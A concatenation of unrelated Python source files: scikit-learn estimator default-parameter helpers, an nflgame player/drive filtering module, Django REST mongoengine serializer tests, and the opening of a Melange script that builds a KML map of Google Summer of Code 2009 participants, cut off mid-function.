('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('class_weight', None), # Set the parameter C of class i to class_weight[i]*C. If not given, all classes are # supposed to have weight=1. The 'auto' mode uses the values of y to automatically # adjust weights inversely proportional to class frequencies. ('verbose', False) )) def svc_nonid_params(): return 'cache_size', 'verbose' ######NuSVC def nusvc_default_params(): return OrderedDict(( ('nu', 0.5), # in [0,1]. An upper bound on the fraction of training errors and a lower bound of the fraction # of support vectors. ('kernel', 'rbf'), ('degree', 3), ('gamma', 0.0), ('coef0', 0.0), ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('class_weight', None), ('verbose', False) )) def nusvc_nonid_params(): return 'cache_size', 'verbose' ######LinearSVC def linsvc_default_params(): return OrderedDict(( ('C', 1.0), # Penalty parameter C of the error term. If None then C is set to n_samples (does not wort atm). ('loss', 'l2'), ('penalty', 'l2'), ('dual', True), ('tol', 1e-4), ('multi_class', 'ovr'), # Determines the multi-class strategy if `y` contains more than two classes. ('fit_intercept', True), ('intercept_scaling', 1.0), ('class_weight', None), ('verbose', 0.0) )) def linsvc_nonid_params(): return 'verbose' ######Support Vector Regression def svr_default_params(): return OrderedDict(( ('C', 1.0), # None does not work ('epsilon', 0.1), # It specifies the epsilon-tube within which no penalty is associated in the training loss # function with points predicted within a distance epsilon from the actual value. ('kernel', 'rbf'), ('degree', 3), ('gamma', 0.0), ('coef0', 0.0), ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('verbose', False) )) def svr_nonid_params(): return 'cache_size', 'verbose' ######NuSVR def nusvr_default_params(): return OrderedDict(( ('C', 1), # None should work, but they have a bug ('nu', 0.5), ('kernel', 'rbf'), ('degree', 3), ('gamma', 0.0), ('coef0', 0.0), ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('verbose', False) )) def nusvr_nonid_params(): return 'cache_size', 'verbose' ############################### # NearestNeigbours ############################### ######K Nearest Neighbours def knc_default_parameters(): return OrderedDict(( ('n_neighbors', 5), ('weights', 'uniform'), ('algorithm', 'auto'), # Can bee 'kd_tree', 'ball_tree', 'brute' or 'auto' ('leaf_size', 30), # only for kd-tree and ball_tree algorithms ('warn_on_equidistant', True), ('p', 2) # Parameter for the Minkowski metric. P=2 -> euclidian distance )) def knc_nonid_params(): return 'warn_on_equidistant' ######Radius Neighbours def rnc_default_params(): return OrderedDict(( ('radius', 1.0), ('weights', 'uniform'), ('algorithm', 'auto'), ('leaf_size', 30), ('p', 2), ('outlier_label', None) # Label, which is given for outlier samples (samples with no neighbors on given radius) # If set to None, ValueError is raised, when outlier is detected. )) def rnc_nonid_params(): return 'outlier_label' # WARNING: not sure about it --> check ######K Nearest Neighbours Regressor def knr_default_params(): return OrderedDict(( ('n_neighbors', 5), ('weights', 'uniform'), ('algorithm', 'auto'), ('leaf_size', 30), ('warn_on_equidistant', True), ('p', 2) )) def knr_nonid_params(): return 'warn_on_equidistant' ######Radius Neighbours Regressor def rnr_default_params(): return OrderedDict(( ('radius', 1.0), ('weights', 'uniform'), ('algorithm', 'auto'), ('leaf_size', 30), ('p', 2), )) def rnr_nonid_params(): return () ######Nearest Centroid def nc_default_params(): return OrderedDict(( ('metric', 'euclidean'), ('shrink_threshold', None) # Threshold for shrinking centroids to remove feature )) def nc_nonid_params(): return () ############################### # GaussianProcesses ############################### ######Gaussian Process def gp_default_params(): return OrderedDict(( ('regr', 'constant'), # A regression function returning an array of outputs of the linear regression # functional basis. Among 'constant', 'linear', 'quadratic'. ('corr', 'squared_exponential'), # A stationary autocorrelation function returning the autocorrelation between # two points x and x'. Can be 'absolute_exponential', 'squared_exponential', # 'generalized_exponential', 'cubic' or 'linear' ('beta0', None), ('storage_mode', 'full'), # A string specifying whether the Cholesky decomposition of the correlation matrix # should be stored in the class ('verbose', False), ('theta0', 1e-1), # The parameters in the autocorrelation model. If thetaL and thetaU are also # specified, theta0 is considered as the starting point for the maximum likelihood # estimation of the best set of parameters. ('thetaL', None), # Lower bound on the autocorrelation parameters for maximum likelihood estimation. ('thetaU', None), # Upper bound on the autocorrelation parameters for maximum likelihood estimation. ('normalize', True), ('nugget', 10. * MACHINE_EPSILON), # Introduce a nugget effect to allow smooth predictions from noisy data. ('optimizer', 'fmin_cobyla'), ('random_start', 1), # The number of times the Maximum Likelihood Estimation should be performed from a # random starting point. ('random_state', 0) # The generator used to shuffle the sequence of coordinates of theta in the Welch # optimizer. If an integer is given, it fixes the seed. )) def gp_nonid_params(): return 'storage_mode', 'verbose' ############################### # Partial Least Squares ############################### ######PLSRegression def plsr_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True), ('max_iter', 500), ('tol', 1e-6), ('copy', True) )) def plsr_nonid_params(): return 'copy' ######PLSCanonical def plscan_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True), ('algorithm', 'nipals'), # The algorithm used to estimate the weights. "nipals" or "svd" ('max_iter', 500), ('tol', 1e-6), ('copy', True) )) def plscan_nonid_params(): return 'copy' ######CCA def cca_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True), ('max_iter', 500), ('tol', 1e-6), ('copy', True) )) def cca_nonid_params(): return 'copy' ######PLSSVD def plssvd_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True) )) def plssvd_nonid_params(): return () ############################### # Decision Trees ############################### ######Decision Tree Classifier def dtc_default_params(): return OrderedDict(( ('criterion', 'gini'), # or 'entropy' ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), # This parameter controls a trade-off in an optimization heuristic. # It controls the minimum density of the `sample_mask` ('max_features', None), # The number of features to consider when looking for the best split. ('compute_importances', False), ('random_state', 0) )) def dtc_nonid_params(): return () # 'compute_importances' ######Decision Tree Regressor def dtr_default_params(): return OrderedDict(( ('criterion', 'mse'), ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', None), ('compute_importances', False), ('random_state', 0) )) def dtr_nonid_params(): return () # 'compute_importances' ######Naive Bayes def gnb_default_params(): return OrderedDict() def gnb_nonid_params(): return () # 'compute_importances' if __name__ == '__main__': print 'Done'
import functools import itertools import operator from nflgame import OrderedDict from nflgame import statmap _BUILTIN_PREDS = { '__lt': operator.lt, '__le': operator.le, '__ne': operator.ne, '__ge': operator.ge, '__gt': operator.gt, } """ A dictionary of suffixes to predicates that can be used in Gen.filter. The suffix corresponds to what to add to the end of a field name to invoke the predicate it corresponds to. For example, this:: players.filter(receiving_rec=lambda v: v > 0) Is equivalent to:: players.filter(receiving_rec__gt=0) (Django users should feel right at home.) """ class Gen (object): """ Players implements a sequence type and provides a convenient API for searching sets of players. """ def __init__(self, iterable): """ Creates a new Players sequence from an iterable where each element of the iterable is an instance of the Player class. """ self.__iter = iterable def filter(self, **kwargs): """ filters the sequence based on a set of criteria. Parameter names should be equivalent to the properties accessible in the items of the sequence. For example, where the items are instances of the Stats class:: players.filter(home=True, passing_tds=1, rushing_yds=lambda x: x>0) Returns a sequence with only players on the home team that have a single passing touchdown and more than zero rushing yards. If a field specified does not exist for a particular item, that item is excluded from the result set. If a field is set to a value, then only items with fields that equal that value are returned. If a field is set to a function---which must be a predicate---then only items with field values satisfying that function will be returned. Also, special suffixes that begin with '__' may be added to the end of a field name to invoke built in predicates. For example, this:: players.filter(receiving_rec=lambda v: v > 0) Is equivalent to:: players.filter(receiving_rec__gt=0) Other suffixes includes gt, le, lt, ne, ge, etc. (Django users should feel right at home.) """ preds = [] for k, v in kwargs.items(): def pred(field, value, item): for suffix, p in _BUILTIN_PREDS.items(): if field.endswith(suffix): f = field[:field.index(suffix)] if not hasattr(item, f) or getattr(item, f) is None: return False return p(getattr(item, f), value) if not hasattr(item, field) or getattr(item, field) is None: return False if isinstance(value, type(lambda x: x)): return value(getattr(item, field)) return getattr(item, field) == value preds.append(functools.partial(pred, k, v)) gen = filter(lambda item: all([f(item) for f in preds]), self) return self.__class__(gen) def limit(self, n): """ Limit the sequence to N items. """ return self.__class__(itertools.islice(self, n)) def sort(self, field, descending=True): """ sorts the sequence according to the field specified---where field is a property on an item in the sequence. If descending is false, items will be sorted in order from least to greatest. Note that if field does not exist in any item being sorted, a KeyError will be raised. """ def attrget(item): return getattr(item, field, 0) return self.__class__(sorted(self, reverse=descending, key=attrget)) def __str__(self): """Returns a list of items in the sequence.""" return '[%s]' % ', '.join([str(item) for item in self]) def __iter__(self): """Make this an iterable sequence.""" if self.__iter is None: return iter([]) if isinstance(self.__iter, OrderedDict): return iter(self.__iter.values()) return iter(self.__iter) def __reversed__(self): """Satisfy the built in reversed.""" return reversed(self.__iter) class GenDrives (Gen): """ GenDrives implements a sequence type and provides a convenient API for searching drives. """ def plays(self): """ Returns all of the plays, in order, belonging to every drive in the sequence. """ return GenPlays(itertools.chain(*[d.plays for d in self])) def players(self): """ Returns the combined player stats for every player that participated in any of the drives in the sequence. """ return self.plays().players() def number(self, n, team=None): """ Gets the Nth drive where the first drive corresponds to n=1. This is only useful given a complete collection of drives for an entire game. If the team parameter is specified (i.e., team='NE'), then n will be interpreted as *that* team's Nth drive. """ assert n > 0 n -= 1 if team is None: return list(self)[n] else: i = 0 for d in self: if d.team == team: if i == n: return d i += 1 assert False, \ 'Could not find drive %d for team %s.' % (n + 1, team) class GenPlays (Gen): """ GenPlays implements a sequence type and provides a convenient API for searching plays. """ def players(self): """ Returns the combined player stats for every play in the sequence. """ players = OrderedDict() for play in self: for player in play.players: if player.playerid not in players: players[player.playerid] = player else: players[player.playerid] += player return GenPlayerStats(players) class GenPlayerStats (Gen): """ GenPlayerStats implements a sequence type and provides a convenient API for searching sets of player statistics. """ def name(self, name): """ Returns a single player whose name equals `name`. If no such player can be found, None is returned. Note that NFL GameCenter formats their names like "T.Brady" and "W.Welker". Thus, `name` should also be in this format. """ for p in self: if p.name == name: return p return None def playerid(self, playerid): """ Returns a single player whose NFL GameCenter identifier equals `playerid`. This probably isn't too useful, unless you're trying to do ID mapping. (Players have different identifiers across NFL.com.) If no such player with the given identifier is found, None is returned. """ for p in self: if p.playerid == playerid: return p return None def touchdowns(self): """ touchdowns is a convenience method for returning a Players sequence of all players with at least one touchdown. """ def gen(): for p in self: for f in p.__dict__: if f.endswith('tds') and p.__dict__[f] > 0: yield p break return self.__class__(gen()) def __filter_category(self, cat): return self.__class__(filter(lambda p: p.has_cat(cat), self)) def passing(self): """Returns players that have a "passing" statistical category.""" return self.__filter_category('passing') def rushing(self): """Returns players that have a "rushing" statistical category.""" return self.__filter_category('rushing') def receiving(self): """Returns players that have a "receiving" statistical category.""" return self.__filter_category('receiving') def fumbles(self): """Returns players that have a "fumbles" statistical category.""" return self.__filter_category('fumbles') def kicking(self): """Returns players that have a "kicking" statistical category.""" return self.__filter_category('kicking') def punting(self): """Returns players that have a "punting" statistical category.""" return self.__filter_category('punting') def kickret(self): """Returns players that have a "kickret" statistical category.""" return self.__filter_category('kickret') def puntret(self): """Returns players that have a "puntret" statistical category.""" return self.__filter_category('puntret') def defense(self): """Returns players that have a "defense" statistical category.""" return self.__filter_category('defense') def penalty(self): """Returns players that have a "penalty" statistical category.""" return self.__filter_category('penalty') def csv(self, fileName, allfields=False): """ Given a file-name fileName, csv will write the contents of the Players sequence to fileName formatted as comma-separated values. The resulting file can then be opened directly with programs like Excel, Google Docs, Libre Office and Open Office. Note that since each player in a Players sequence may have differing statistical categories (like a quarterback and a receiver), the minimum constraining set of statisical categories is used as the header row for the resulting CSV file. This behavior can be changed by setting 'allfields' to True, which will use every available field in the header. """ import csv fields, rows = set([]), [] players = list(self) for p in players: for field, stat in p.stats.items(): fields.add(field) if allfields: for statId, info in statmap.idmap.items(): for field in info['fields']: fields.add(field) fields = sorted(list(fields)) for p in players: d = { 'name': p.name, 'id': p.playerid, 'home': p.home and 'yes' or 'no', 'team': p.team, 'pos': 'N/A', } if p.player is not None: d['pos'] = p.player.position for field in fields: if field in p.__dict__: d[field] = p.__dict__[field] else: d[field] = "" rows.append(d) fieldNames = ["name", "id", "home", "team", "pos"] + fields rows = [dict((f, f) for f in fieldNames)] + rows csv.DictWriter(open(fileName, 'w+'), fieldNames).writerows(rows) def __add__(self, other): """ Adds two sequences of players by combining repeat players and summing their statistics. """ players = OrderedDict() for p in itertools.chain(self, other): if p.playerid not in players: players[p.playerid] = p else: players[p.playerid] += p return GenPlayerStats(players)
from collections import OrderedDict import pytest from django.test import TestCase from mongoengine import Document, EmbeddedDocument, fields from rest_framework import fields as drf_fields from rest_framework.serializers import Field, Serializer from rest_framework_mongoengine.fields import DocumentField from rest_framework_mongoengine.serializers import ( DocumentSerializer, EmbeddedDocumentSerializer ) from .models import DumbEmbedded, OtherEmbedded from .utils import dedent class NestedEmbeddedDoc(EmbeddedDocument): name = fields.StringField() embedded = fields.EmbeddedDocumentField(DumbEmbedded) class SelfEmbeddingDoc(EmbeddedDocument): name = fields.StringField() embedded = fields.EmbeddedDocumentField('self') class EmbeddingDoc(Document): embedded = fields.EmbeddedDocumentField(DumbEmbedded) class NestedEmbeddingDoc(Document): embedded = fields.EmbeddedDocumentField(NestedEmbeddedDoc) class RequiredEmbeddingDoc(Document): embedded = fields.EmbeddedDocumentField(DumbEmbedded, required=True) class ListEmbeddingDoc(Document): embedded_list = fields.EmbeddedDocumentListField(DumbEmbedded) class RecursiveEmbeddingDoc(Document): embedded = fields.EmbeddedDocumentField(SelfEmbeddingDoc) class GenericEmbeddingDoc(Document): embedded = fields.GenericEmbeddedDocumentField() class TestEmbeddingMapping(TestCase): def test_embbedded(self): class TestSerializer(EmbeddedDocumentSerializer): class Meta: model = DumbEmbedded fields = '__all__' expected = dedent(""" TestSerializer(): name = CharField(required=False) foo = IntegerField(required=False) """) assert repr(TestSerializer()) == expected def test_embedding(self): class TestSerializer(DocumentSerializer): class Meta: model = NestedEmbeddingDoc fields = '__all__' depth = 1 expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) foo = IntegerField(required=False) """) assert repr(TestSerializer()) == expected def test_embedding_nodepth(self): class TestSerializer(DocumentSerializer): class Meta: model = NestedEmbeddingDoc fields = '__all__' depth = 0 expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) foo = IntegerField(required=False) """) assert repr(TestSerializer()) == expected def test_embedding_restricted(self): class TestSerializer(DocumentSerializer): class Meta: model = NestedEmbeddingDoc fields = '__all__' depth_embedding = 1 expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = HiddenField(default=None, required=False) """) assert repr(TestSerializer()) == expected def test_embedding_recursive(self): class TestSerializer(DocumentSerializer): class Meta: model = RecursiveEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = HiddenField(default=None, required=False) """) serializer = TestSerializer() assert repr(serializer) == expected def test_embedding_recursive_restricted(self): class TestSerializer(DocumentSerializer): class Meta: model = RecursiveEmbeddingDoc fields = '__all__' depth_embedding = 2 expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = HiddenField(default=None, required=False) """) serializer = TestSerializer() assert repr(serializer) == expected def test_embedding_nested(self): class TestSerializer(DocumentSerializer): class Meta: model = NestedEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) embedded = EmbeddedSerializer(required=False): name = CharField(required=False) foo = IntegerField(required=False) """) assert repr(TestSerializer()) == expected def test_embedding_list(self): class TestSerializer(DocumentSerializer): class Meta: model = ListEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded_list = EmbeddedSerializer(many=True, required=False): name = CharField(required=False) foo = IntegerField(required=False) """) assert repr(TestSerializer()) == expected def test_embedding_required(self): class TestSerializer(DocumentSerializer): class Meta: model = RequiredEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=True): name = CharField(required=False) foo = IntegerField(required=False) """) assert repr(TestSerializer()) == expected def test_embedding_generic(self): class TestSerializer(DocumentSerializer): class Meta: model = GenericEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = GenericEmbeddedDocumentField(model_field=<mongoengine.fields.GenericEmbeddedDocumentField: embedded>, required=False) """) assert repr(TestSerializer()) == expected def test_embedding_custom_generic(self): class CustomEmbedding(DocumentField): pass class TestSerializer(DocumentSerializer): serializer_embedded_generic = CustomEmbedding class Meta: model = GenericEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = CustomEmbedding(model_field=<mongoengine.fields.GenericEmbeddedDocumentField: embedded>, required=False) """) assert repr(TestSerializer()) == expected def test_embedding_custom_nested(self): class CustomTestSerializer(Serializer): bla = drf_fields.CharField() class TestSerializer(DocumentSerializer): serializer_embedded_nested = CustomTestSerializer class Meta: model = NestedEmbeddingDoc fields = '__all__' expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = EmbeddedSerializer(required=False): bla = CharField() """) assert repr(TestSerializer()) == expected def test_embedding_custom_bottom(self): class CustomEmbedding(Field): bla = drf_fields.CharField() class TestSerializer(DocumentSerializer): serializer_embedded_bottom = CustomEmbedding class Meta: model = NestedEmbeddingDoc fields = '__all__' depth_embedding = 0 expected = dedent(""" TestSerializer(): id = ObjectIdField(read_only=True) embedded = CustomEmbedding(default=None, required=False) """) assert repr(TestSerializer()) == expected class EmbeddingSerializer(DocumentSerializer): class Meta: model = EmbeddingDoc fields = '__all__' class NestedEmbeddingSerializer(DocumentSerializer): class Meta: model = NestedEmbeddingDoc fields = '__all__' class TestEmbeddedIntegration(TestCase): """ should work on isolated embedded docs """ def test_retrieve(self): """ serializing standalone doc """ class TestSerializer(EmbeddedDocumentSerializer): class Meta: model = OtherEmbedded fields = '__all__' instance = OtherEmbedded(name="qwe", bar=123) serializer = TestSerializer(instance) assert serializer.data == OrderedDict([('name', "qwe"), ('bar', 123)]) def test_create(self): """ creating standalone instance """ class TestSerializer(EmbeddedDocumentSerializer): class Meta: model = OtherEmbedded fields = '__all__' data = {'name': "qwe", 'bar': 123} serializer = TestSerializer(data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance, OtherEmbedded) assert instance.name == "qwe" assert instance.bar == 123 def test_update(self): """ updating standalone instance with partial data """ class TestSerializer(EmbeddedDocumentSerializer): class Meta: model = OtherEmbedded fields = '__all__' instance = OtherEmbedded(name="qwe", bar=123) data = {'bar': 234} serializer = TestSerializer(instance, data=data, partial=True) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance, OtherEmbedded) assert instance.name == "qwe" assert instance.bar == 234 class TestEmbeddingIntegration(TestCase): def doCleanups(self): EmbeddingDoc.drop_collection() def test_retrieve(self): instance = EmbeddingDoc.objects.create( embedded=DumbEmbedded(name="Foo") ) serializer = EmbeddingSerializer(instance) expected = { 'id': str(instance.id), 'embedded': OrderedDict((('name', "Foo"), ('foo', None))), } assert serializer.data == expected def test_create(self): data = { 'embedded': {'name': "emb"} } serializer = EmbeddingSerializer(data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance.embedded, DumbEmbedded) assert instance.embedded.name == "emb" expected = { 'id': str(instance.id), 'embedded': OrderedDict((('name', "emb"), ('foo', None))), } assert serializer.data == expected def test_update(self): instance = EmbeddingDoc.objects.create( embedded=DumbEmbedded(name="emb", foo=123) ) data = { 'embedded': {'foo': 321} } serializer = EmbeddingSerializer(instance, data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance.embedded, DumbEmbedded) assert instance.embedded.name is None assert instance.embedded.foo == 321 expected = { 'id': str(instance.id), 'embedded': OrderedDict((('name', None), ('foo', 321))), } assert serializer.data == expected @pytest.mark.skipif(True, reason="TODO") def test_update_partial(self): pass class TestNestedEmbeddingIntegration(TestCase): def doCleanups(self): NestedEmbeddingDoc.drop_collection() def test_retrieve(self): instance = NestedEmbeddingDoc.objects.create( embedded=NestedEmbeddedDoc( name='Foo', embedded=DumbEmbedded(name="Bar") ) ) serializer = NestedEmbeddingSerializer(instance) expected = { 'id': str(instance.id), 'embedded': OrderedDict(( ('name', "Foo"), ('embedded', OrderedDict(( ('name', "Bar"), ('foo', None) ))) )), } assert serializer.data == expected def test_create(self): data = { 'embedded': { 'name': 'Foo', 'embedded': {'name': "emb"} } } serializer = NestedEmbeddingSerializer(data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance.embedded, NestedEmbeddedDoc) assert instance.embedded.name == "Foo" assert isinstance(instance.embedded.embedded, DumbEmbedded) assert instance.embedded.embedded.name == 'emb' assert instance.embedded.embedded.foo is None expected = { 'id': str(instance.id), 'embedded': OrderedDict(( ('name', "Foo"), ('embedded', OrderedDict((('name', "emb"), ('foo', None)))) )), } assert serializer.data == expected def test_update(self): instance = NestedEmbeddingDoc.objects.create( embedded=NestedEmbeddedDoc( name='Foo', embedded=DumbEmbedded(name="Bar") ) ) data = { 'embedded': { 'name': 'Bar', 'embedded': {"foo": 321} } } serializer = NestedEmbeddingSerializer(instance, data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance.embedded, NestedEmbeddedDoc) assert instance.embedded.name == "Bar" assert isinstance(instance.embedded.embedded, DumbEmbedded) assert instance.embedded.embedded.name is None assert instance.embedded.embedded.foo == 321 expected = { 'id': str(instance.id), 'embedded': OrderedDict(( ('name', 'Bar'), ('embedded', OrderedDict(( ('name', None), ('foo', 321) ))) )), } assert serializer.data == expected @pytest.mark.skipif(True, reason="TODO") def test_update_partial(self): pass class ListEmbeddingSerializer(DocumentSerializer): class Meta: model = ListEmbeddingDoc fields = '__all__' class TestListEmbeddingIntegration(TestCase): def doCleanups(self): ListEmbeddingDoc.drop_collection() def test_retrieve(self): instance = ListEmbeddingDoc.objects.create( embedded_list=[DumbEmbedded(name="Foo"), DumbEmbedded(name="Bar")] ) serializer = ListEmbeddingSerializer(instance) expected = { 'id': str(instance.id), 'embedded_list': [ OrderedDict((('name', "Foo"), ('foo', None))), OrderedDict((('name', "Bar"), ('foo', None))) ], } assert serializer.data == expected def test_create(self): data = { 'embedded_list': [ {'name': "Foo"}, {'foo': 123} ] } serializer = ListEmbeddingSerializer(data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance, ListEmbeddingDoc) assert isinstance(instance.embedded_list[0], DumbEmbedded) assert instance.embedded_list[0].name == "Foo" assert instance.embedded_list[0].foo is None assert instance.embedded_list[1].name is None assert instance.embedded_list[1].foo == 123 expected = { 'id': str(instance.id), 'embedded_list': [ OrderedDict((('name', "Foo"), ('foo', None))), OrderedDict((('name', None), ('foo', 123))) ] } assert serializer.data == expected def test_update(self): instance = ListEmbeddingDoc.objects.create( embedded_list=[DumbEmbedded(name="Foo"), DumbEmbedded(name="Bar")] ) data = { 'embedded_list': [ OrderedDict((('name', "Baz"), ('foo', 321))) ] } serializer = ListEmbeddingSerializer(instance, data=data) assert serializer.is_valid(), serializer.errors instance = serializer.save() assert isinstance(instance, ListEmbeddingDoc) assert isinstance(instance.embedded_list[0], DumbEmbedded) assert len(instance.embedded_list) == 1 assert instance.embedded_list[0].name == "Baz" assert instance.embedded_list[0].foo == 321 expected = { 'id': str(instance.id), 'embedded_list': [OrderedDict((('name', "Baz"), ('foo', 321)))], } assert serializer.data == expected @pytest.mark.skipif(True, reason="TODO") def test_update_partial(self): pass class ValidatingEmbeddedModel(EmbeddedDocument): text = fields.StringField(min_length=3) class ValidatingEmbeddingModel(Document): embedded = fields.EmbeddedDocumentField(ValidatingEmbeddedModel) class ValidatingSerializer(DocumentSerializer): class Meta: model = ValidatingEmbeddingModel fields = '__all__' depth = 1 class ValidatingListEmbeddingModel(Document): embedded_list = fields.EmbeddedDocumentListField(ValidatingEmbeddedModel) class ValidatingListSerializer(DocumentSerializer): class Meta: model = ValidatingListEmbeddingModel fields = '__all__' depth = 1 class TestEmbeddedValidation(TestCase): def test_validation_failing(self): serializer = ValidatingSerializer(data={'embedded': {'text': 'Fo'}}) assert not serializer.is_valid() assert 'embedded' in serializer.errors assert 'text' in serializer.errors['embedded'] def test_validation_passing(self): serializer = ValidatingSerializer(data={'embedded': {'text': 'Text'}}) assert serializer.is_valid(), serializer.errors def test_nested_validation_failing(self): serializer = ValidatingListSerializer(data={'embedded_list': [{'text': 'Fo'}]}) assert not serializer.is_valid() assert 'embedded_list' in serializer.errors assert 'text' in serializer.errors['embedded_list'][0] def test_nested_validation_passing(self): serializer = ValidatingListSerializer(data={'embedded_list': [{'text': 'Text'}]}) assert serializer.is_valid(), serializer.errors
#!/usr/bin/env python2.5 # # Copyright 2009 the Melange authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The script which generates KML file for Google Summer of Code 2009 program. """ __authors__ = [ '"Daniel Hans" <daniel.m.hans@gmail.com>', ] import sys import codecs import interactive from xml.dom.minidom import Document def _getMentoredProjects(mentor): """Returns a list of projects which are mentored by a given mentor. """ from soc.logic.models.student_project import logic as project_logic filter = { 'mentor': mentor } return project_logic.getForFields(filter=filter) def _getAcceptedOrgs(): """Returns a list of organizations which got accepted. """ from soc.logic.models.organization import logic as org_logic filter = { 'status': 'active' } entities = org_logic.getForFields(filter=filter) filter = { 'status': 'new' } entities += org_logic.getForFields(filter=filter) return entities def _getStudentProject(entity): """Returns a project for a given student. """ from soc.logic.models.student_project import logic as project_logic filter = { 'student': entity, 'status': 'accepted', } return project_logic.getForFields(filter=filter, unique=True) def _getAllUsers(): """Returns a list of all valid users. """ from soc.models.user import User gen = lambda: User.all().filter('status =', 'valid') return interactive.deepFetch(gen) def _getAllOrgAdmins(): """Returns a generator of all active mentors. """ from soc.models.org_admin import OrgAdmin gen = lambda: OrgAdmin.all().filter('status = ', 'active') return interactive.deepFetch(gen) def _getAllMentors(): """Returns a generator of all active mentors. """ from soc.models.mentor import Mentor gen = lambda: Mentor.all().filter('status = ', 'active') return interactive.deepFetch(gen) def _getAllStudents(): """Returns a generator of all active students. """ from soc.models.student import Student gen = lambda: Student.all().filter('status = ', 'active') return interactive.deepFetch(gen) def _getPersonStyle(doc, type): """Returns <Style> element for a particular person. """ if type == 'org_admin': x_text, y_text = '0', '0' elif type == 'mentor': x_text, y_text = '128', '96' elif type == 'student': x_text, y_text = '64', '160' style = doc.createElement('Style') icon_style = doc.createElement('IconStyle') style.appendChild(icon_style) icon = doc.createElement('Icon') icon_style.appendChild(icon) href = doc.createElement('href') icon.appendChild(href) text = doc.createTextNode('root://icons/palette-5.png') href.appendChild(text) x = doc.createElement('x') icon.appendChild(x) text = doc.createTextNode(x_text) x.appendChild(text) y = doc.createElement('y') icon.appendChild(y) text = doc.createTextNode(y_text) y.appendChild(text) w = doc.createElement('w') icon.appendChild(w) text = doc.createTextNode('32') w.appendChild(text) h = doc.createElement('h') icon.appendChild(h) text = doc.createTextNode('32') h.appendChild(text) return style def _getLineStringStyle(doc): """Returns <Style> element for a line string placemark. """ style = doc.createElement('Style') line_style = doc.createElement('LineStyle') style.appendChild(line_style) color = doc.createElement('color') line_style.appendChild(color) text = doc.createTextNode('ff00ff00') color.appendChild(text) width = doc.createElement('width') line_style.appendChild(width) text = doc.createTextNode('1') width.appendChild(text) return style def _getDescriptionForStudent(doc, student, project): """Returns <description> element for a given student. """ description = doc.createElement('description') text = doc.createTextNode('Working on...') description.appendChild(text) description.appendChild(doc.createElement('br')) i = doc.createElement('i') description.appendChild(i) title = doc.createTextNode(project.title) i.appendChild(title) description.appendChild(doc.createElement('br')) mentor = doc.createTextNode( 'mentored by ' + _getName(project.mentor)) description.appendChild(mentor) description.appendChild(doc.createElement('br')) org = doc.createTextNode(project.scope.name) description.appendChild(org) description.appendChild(doc.createElement('br')) description.appendChild(doc.createElement('br')) description = _appendHomePageAndBlogContent(doc, description, student) description = _appendStateAndCountryContnent(doc, description, student) return description def _appendStateAndCountryContnent(doc, description, state, country): """Appends state and country info to the description of a placemark. """ if state: description.appendChild(doc.createTextNode(state + ', ')) description.appendChild(doc.createTextNode(country)) return description def _appendHomePageAndBlogContent(doc, description, home_pages, blogs): """Appends home page and blog info to the description of a placemark. """ if home_pages: text = doc.createTextNode('Home page:') description.appendChild(text) description.appendChild(doc.createElement('br')) for home_page in home_pages: description.appendChild(doc.createTextNode(home_page)) description.appendChild(doc.createElement('br')) if home_pages: description.appendChild(doc.createElement('br')) if blogs: text = doc.createTextNode('Blog:') description.appendChild(text) description.appendChild(doc.createElement('br')) for blog in blogs: description.appendChild(doc.createTextNode(blog)) description.appendChild(doc.createElement('br')) if blogs: description.appendChild(doc.createElement('br')) return description def _getName(entity): """For a given entity 